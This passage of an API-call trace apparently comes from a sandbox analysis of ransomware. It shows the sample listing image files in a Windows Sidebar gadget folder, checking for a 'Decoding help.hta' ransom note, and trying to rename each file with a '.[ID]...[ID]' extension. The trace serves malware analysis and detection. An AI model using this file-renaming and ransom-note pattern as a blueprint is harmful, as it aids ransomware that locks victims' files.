[0059.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0059.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0059.079] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonDown_Off.png") returned 1 [0059.079] lstrlenW (lpString="buttonDown_Off.png") returned 18 [0059.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.079] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0059.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonDown_Off.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" [0059.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" [0059.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.424] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba5de162, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba5de162, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4f677dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonDown_On.png", cAlternateFileName="")) returned 1 [0059.424] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.424] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0059.424] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0059.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0059.425] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonDown_On.png") returned 1 [0059.425] lstrlenW (lpString="buttonDown_On.png") returned 17 [0059.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0059.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonDown_On.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" [0059.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" [0059.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.425] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba5b8003, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba5b8003, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4f8d93c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x118, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonUp_Off.png", cAlternateFileName="")) returned 1 [0059.425] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0059.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0059.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0059.425] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonUp_Off.png") returned 1 [0059.425] lstrlenW (lpString="buttonUp_Off.png") returned 16 [0059.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0059.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0059.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonUp_Off.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" [0059.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" [0059.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.386] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba5b8003, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba5b8003, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4f8d93c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonUp_On.png", cAlternateFileName="")) returned 1 [0060.386] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0060.386] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0060.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0060.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0060.386] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonUp_On.png") returned 1 [0060.386] lstrlenW (lpString="buttonUp_On.png") returned 15 [0060.386] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0060.386] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0060.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonUp_On.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" [0060.386] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" [0060.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.387] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba6042c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba6042c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4fb3a9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x112b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyoutBack.png", cAlternateFileName="")) returned 1 [0060.387] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0060.387] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0060.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0060.387] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0060.387] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyoutBack.png") returned -1 [0060.387] lstrlenW (lpString="flyoutBack.png") returned 14 [0060.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0060.387] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0060.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="flyoutBack.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" [0060.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" [0060.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.307] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4f9928, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4f9928, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc4fb3a9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="item_hover_docked.png", cAlternateFileName="")) returned 1 [0061.308] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.308] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0061.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.308] lstrcmpiW (lpString1="Decoding help.hta", lpString2="item_hover_docked.png") returned -1 [0061.308] lstrlenW (lpString="item_hover_docked.png") returned 21 [0061.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.308] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0061.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="item_hover_docked.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" [0061.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" [0061.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.308] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba51fa87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba51fa87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc5d89a7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="item_hover_floating.png", cAlternateFileName="")) returned 1 [0061.308] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.308] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0061.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") 